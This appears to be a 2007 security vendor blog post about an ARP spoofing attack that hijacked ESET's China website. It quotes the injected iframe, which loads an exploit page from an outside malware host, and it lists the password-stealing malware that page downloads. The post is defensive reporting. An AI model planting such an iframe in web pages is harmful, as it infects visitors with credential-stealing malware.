Nod to more ARP mayhem ?

Following our blog about the significance of web hosting security vs ARP spoofing, our friends from security vendor ESET made an official statement on October 9th, about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, their web pages were found inserted with the following malicious IFRAME link:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014 , can download a variety of malware including:

• vip1.htm (Exploit-BaoFeng.a)
• 0.exe (PWS-QQGame)
• kvmxeis.exe (PWS-OnlineGames.a)
• ii.exe (PWS-QQPass.dll)
• SysWin78.Jmp (PWS-QQGame)
• WinSys88.Sys (PWS-QQGame)
• System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks -style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities – Exploit-MS06-014, Exploit-MS07-004, etc. to application-level vulnerabilities such as Yahoo Messenger, a Chinese media player called Baofeng and PPStream.

Network intrusion prevention security, web server policies and patch management comes to mind as needed minimum defenses and should to be reviewed by companies both using or offering web services as well as ISPs.